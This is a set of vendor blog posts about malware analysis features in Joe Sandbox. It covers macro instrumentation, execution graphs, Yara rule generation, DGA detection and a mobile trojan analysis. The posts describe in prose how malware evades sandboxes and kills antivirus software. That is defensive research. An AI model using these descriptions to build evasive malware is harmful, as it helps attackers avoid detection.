Dynamically Analyze Offices Macros by instrumenting VBE

    Introduction

    As you all know, Microsoft Office documents have become a new attack vector. They allow to easily transfer exploit or dropper code by e-mail to victims by embedding macro code. Since sending executable files such as exe, scr or cpl files as an e-mail attachment is usually blocked, Office documents remain one of the last options. However, a further obstacle is that macros are often disabled on the victims host, so the code will not directly be executed. In order to lure the user to enable macros various social engineering tricks are being used:


    Macros can be analyzed with static analysis very easily. In order to do so one parses the document structure, searches for OLE streams, and then extracts the VBA code:



    Signatures can be used to detect suspicious API calls inside the code:




    Writing static deobfuscator is a dead end

    Such static signatures are part of Joe Sandbox since we have seen such malicious Office documents with macro payloads. As you may guess it did not take long and macro code was no longer easily human readable but source code obfuscated:



    Such obfuscations are simple and work well to evade static signatures on the code. In order to get the clean code one may develop deobfuscators. However, this is a dead end. First, it is always reactive, you have to understand the deobfuscation technique first before you can write a deobfuscator. Second, it is very easy to randomize obfuscations. Finally, it takes time and effort to develop new deobfuscator. For instance, the following code does not use any Chr based string obfuscation but rather a more complex algorithm (checkout that all the variables have names of persons):




    Dynamically Analyzing VBA Code by instrumenting VBE

    The solution to the obfuscation problem of VBA code is dynamic analysis. We have successfully instrumented the Visual Basic runtime interpreter in order to track code execution. We already used the same approach in order to capture Java Script compilation and DOM modification events in the Internet Explorer. This greatly helps to understand obfuscated Java Script and browser exploits:


    The VBE instrumentation we have added to Joe Sandbox allows us to see live VBA data, for instance string decryption:

     

    Signatures to detect suspicious strings inside decrypted data:



    The cool thing about the VBE instrumentation is that as long as the VBA code is executed it enables  to see everything no matter how sophisticated the obfuscation is. In addition, it enables Joe Sandbox to inspect live execution data for malware written in Visual Basic. Lot of APTs have an crypter or obfuscation stub written in VB.

    Conclusing

    Using pure static analysis in the context of deobfuscating source code of script languages is a dead end. It costs a lot of time to develop deobfuscator while it is super easy to randomize or change the obfuscation in order to evade the deobfuscator. Custom dynamic analysis which instruments the script interpreter core does not care about code obfuscation, it sees everything such as decrypted data. This feature facilitates the malware reverse engineering and analysis process, and makes generic detection more sound.

    Full Analysis Report:



    The Power of Execution Graphs Part 1/3

    Introduction

    We have been quite busy and will soon release Joe Sandbox 12. It is so far one of the biggest releases we have made and includes several new features such as:

    • Execution graphs
    • Yara rule generator (see http://www.yara-generator.net/)
    • MITM SSL proxy to inspect HTTPS (credits to Daniel Roethlisberger)
    • 63 behavior signatures
    • Behavior signatures to detect unpacked / dynamic code
    • More than 10 behavior signatures to detect evasive behavior
    • Score algorithm with lower FP and FN
    • System event logging
    • Slim PCAPs
    • Per process memory and CPU stats
    In this and two follow-up blog posts we are going to outline a new feature called Execution Graphs. 

    Evading sandboxes is a key feature of today’s advanced threats. To do so malware uses various tricks for checking whether it is running on an analysis system, such as trying to detect if the current system is a virtual / emulated machine or checking whether it is being debugged or analyzed. In such cases, the malware will keep a low profile and avoid exhibiting its actual malicious behavior, potentially evading detection by the malware analysis system. Latest threats also implement generic evasion such as validating user behavior or time and sleep tricks (see blog post http://bit.ly/1uZBmN2 and http://bit.ly/1qNT3Bu).

    Since version 7, released in 2012 Joe Sandbox implements a variety of techniques to prevent or detect evasive malware. This includes execution on native systems, analysis of non-executed functions through Hybrid Code Analysis (HCA), specific signatures for identifying evasive patterns as well as cookbooks. 

    In the last months we have seen a strong increase of more sophisticated evasion techniques in malware which are harder to find. Therefore we have decided to make this topic a key for Joe Security’s research roadmap.  

    Execution Graphs

    One of the new features we added to Joe Sandbox 12 are Execution Graphs. Execution Graphs have been designed to automatically spot evasions but also to help to quickly understand how the malware implements the evasion. 




    In general an Execution Graph is a highly condensed control flow graph with a focus on API-rich paths. Since it is highly compressed it is easier to understand than a full control flow graph. The graph is composed of nodes representing sections of code and edges correspond to the control-flow (call, jmps etc) of the malware. Each node is labeled with the set of API calls it executes. Nodes are colored to highlight additional properties:

    • Yellow: the node is a program / thread entry point or a top level function
    • Orange: the code has been triggered during execution
    • Red: the code has been unpacked and executed
    • Grey / blackish: the code has not been executed
    Different shapes are used for highlighting graph locations. The diamond-shaped nodes correspond to so-called key decision nodes, in the sense that the process decides at this node to avoid execution of a branch which could lead to interesting key behavior. Thus key decision nodes are especially relevant when browsing the execution graph for evasive behavior. Note that determining whether a decision node is key depends on the execution status of the nodes reachable through its branches (one branch should lead to executed APIs, the other to different non-executed APIs), thus different executions may lead to different key decision nodes.

    The following figure shows the initial part of the execution graph for our demo sample (MD5: 0af4ef5069f47a371a0caf22ae2006a6). 


    Notice how the first few nodes after the entry point (colored yellow) have an orange/red color, while the other nodes are grey/black? Recall that red coloring indicates that the corresponding code has been executed, while black is used for non-executed code.

    When zooming in the graph entry node, the following control-flow pattern appears:



    The sample execution graph clearly exhibits a very straightforward evasive behavior: there is a key decision point where the GetSystemTime API is called, followed by another key decision and a call to the ExitProcess API. All these nodes are colored in red and thus are executed: the part of the graph starting at GetVersionExA is not executed (grey and black color): the full execution graph includes a lot of non-executed malicious behavior not shown here. The green edges represent so-called rich paths, which allow the analyst to track the most API intensive paths of the execution graph, independently from their actual execution status.A path is considered to be "intensive" if a lot of APIs are executed which appear in malicious codes. Here the rich path leads to some non-executed part of the graph:


    The blue edges represent thread creations, and the yellow nodes are thread entry points. In the given sample each created thread has its own malicious payload:

    • Thread 4098a0:  its task is to terminate debugging tools and Antivirus. Function 4095e0 is registered as a callback using the EnumWindows API: it enumerates all top-level windows and checks their title against strings such as "avast", "avira" or "kaspersky" among many others. If the title matches the processes is killed instantly.

    • Thread 407230 is in charge of persistence and installation behavior.
    • Thread 407180 spreads its main executable to external drives, since it checks for available system drives and uses API call chains often found in USB drive infection routines (GetDriveType, CopyFile, SetFileAttributes).

    • Thread 407a80: parses remote commands. It is the main payload thread which acts as a broker.

    The structure of the graph as well as all additional properties such as execution coverages or decision nodes are directly passed to the signature interface of Joe Sandbox. This enables to write behavior rules which detect evasive behavior.


    We may navigate between the execution graphs and the corresponding assembly code.  In the case of sample MD5 0af4ef5069f47a371a0caf22ae2006a6, we can determine that the current system time returned by GetSystemTime is checked in the code associated with the key decision nodes, and depending on its value the sample decides to exit the process or continue with execution:



    Same for the command handler found in thread 407a80:



    Conclusion

    Execution graphs are a powerful tool for detecting and understanding evasive behavior. Due to its form, coloring and node shapes we can spot evasion pattern very efficiently. Since the graph is reduced and simplified this also works with very complex and extensive codes. The structure of the graph and all attributes are fed to the Joe Sandbox signature interface. Therefore we can easily rate and classify evasive behavior within seconds. Since the graph describes the complete behavior and not just the executed path, any behavior can be rated and classified.

    During development execution graphs already have proven to be very useful. Therefore we will present some of our detection of more complex behaviors / evasion in two additional blog posts. Stay tuned!

    Example Reports for the sample used in the post:



    Introduction Yara Rule Generator

    A couple of months ago we started to work on a new feature for Joe Sandbox we call Yara Rule Generator. Yara is a well known pattern matching engine built for the purpose of writing simple malware detection rules:

     

    Yara main use is to detect APT and advanced threats which AV does not detect that quickly. A big part of Joe Security's customers use Yara on a daily basis. Due to that we got many requests about adding a feature to Joe Sandbox to automatically generate Yara rules and finally decided to take up that challenge.

    Today we release a new free service you find at www.yara-generator.net. Yara Rule Generator creates Yara rules automatically based on behavior data such as files and memory captured by Joe Sandbox.


    How does the Joe Sandbox Yara Rule Generator work and what kind of rules does it generate? The generator creates three different rules per submitted sample:



    File rules enable to search for the submitted sample. Dropped rules are rules generated out of files which have been created or downloaded by the initial sample during dynamic analysis. Memory opcode rules finally are generated by using memory dumps. File and dropped rules enable  to scan for the particular sample on the file system. Memory opcode rules on the other hand allow to find malware in the process memory (you can specify a process id as a target if you launch Yara or use our batch file to scan all processes) of a target system.

    Further a rule can be a simple or super rule. Simple rule are specific to the submitted sample and its behavior. Therefore they do not match variants of the same malware. Super rules are generic and are built over a set of uploaded samples / behavior. Since they only capture common behavior they often find malware variants:



    To generate rules the Joe Sandbox Yara Rule Generator extracts different kind of behavior data such as:

    • PE structure data (e.g. section names)
    • Strings (unicode and ascii)
    • Code sequences (e.g. entrypoint)
    • Opcodes sequences from HCA (Hybrid Code Analysis)
    All the extracted artifacts are then rated based on knowledge, entropy and location information. After artifact selection a test rule is generated and it's false positive rate measured by using a reference goodware set. Finally the rule is taken if the false positive rate is acceptable.

    For super rules Joe Sandbox Yara Rule Generator uses an efficient clustering algorithm to find common opcode sequences.

    Results look very promising. To test super rules we have generated rules by using malware family sets. We took three samples out of the set and generated super rules. We then infected a test system with a fourth sample of the same family and searched it with our rules:


    Of course also the file and dropped rules work well:


    However please note that the Yara Rule Generator is no silver bullet. Creation of simple and super rule is tricky and far from perfect. During the development of version 1.0.0 we spot lot of areas for improvements. All the rules are well commented and documented. Therefore it is simple to extend or change the rules.

    The Yara Rule Generator has already been deeply integrated into the Joe Sandbox platform and will be shipped with the next major release.

    Happy Rule Creation!

    Update 1:

    We were inspired by yaraGen from Florian Roth as well as https://yaragenerator.com.

    Happy New Year!

          
          The Joe Security team wishes you success, satisfaction and many pleasant moments in 2015!

    New Sandbox Evasion Tricks spot with Joe Sandbox 10.5

    Recently we came accross an interesting sample equipped with new tricks to evade sandboxes and other dynamic analysis systems:


     In pseude code:


    The sample sleeps until there is a mouse and foreground window change. Since most malware analysis system only simulate mouse changes they miss to analyze the real malicious payload. With the Cookbook technology of Joe Security one can easily simulate any activites:


    However this is not enough. The sample includes an additional evasion trick:



    Basically the disk is queried for IOCTL_DISK_GET_DRIVE_GEOMETRY_EX. The structure contains information like the media type, sector per track and the number of cylinders of the hard disk. After the query the number of cylinders is compared to value 5000. If there are less than 5000 cylinders the sample simple terminates. Since Joe Sandbox runs on any device including virtual, simulated and native systems one can quickly analyze the malware on real system:





    Finding a DGA in less than one Minute

    Recently, we stumbled upon a malware sample (MD5: 177b75910ae8c0091bafef4950c0b224) that obviously employs a domain generation algorithm (DGA). We analyzed the sample with Joe Sandbox 10.5 which will be released soon.

    As the signature overview highlights, Joe Sandbox has detected that the malware generates random DNS queries:


    Massive injections and system behavior has been detected as well:


    Also the network behavior is quite extensive:



    One of the cool new features of Joe Sandbox 10 is a context based search integrated into the behavior analysis reports. With it you can search any data Joe Sandbox has captured:


    In order to find the DGA, search for the term "DNSQuery":



    It seems explorer.exe is doing some DNS queries. Clicking on the search hits lets one navigate easily to the corresponding data:


    As the cutting outlines, DnsQuery_A has been called 244 times which matches the extensive network behavior. By clicking on the source address one can jump to the function where this DnsQuery API has been called:


    The instructions before the DnsQuery API outline that the domain name is generated generated by the function 12AE200. With the help of the IDA Bridge plugin, one can load memory dumps extracted by Joe Sandbox easily:


    And pull in dynamic behavior data:


    Full Analysis Report available at (use Firefox to open it):



    Analysis of Code4HK with Joe Sandbox Mobile

    As the media and several tech companies already outlined a fake smartphone app is being used to remotely monitor pro-democracy protesters in Hong Kong. We came accross the corresponding malware via our APK Analyzer (www.apk-analyzer.net):


    A full analysis can be downloaded here:

    The Joe Sandbox Mobile analysis is very nice and shows all spying and control payloads of the trojan. Rather then explaining all details we just add here some interesting report cuttings: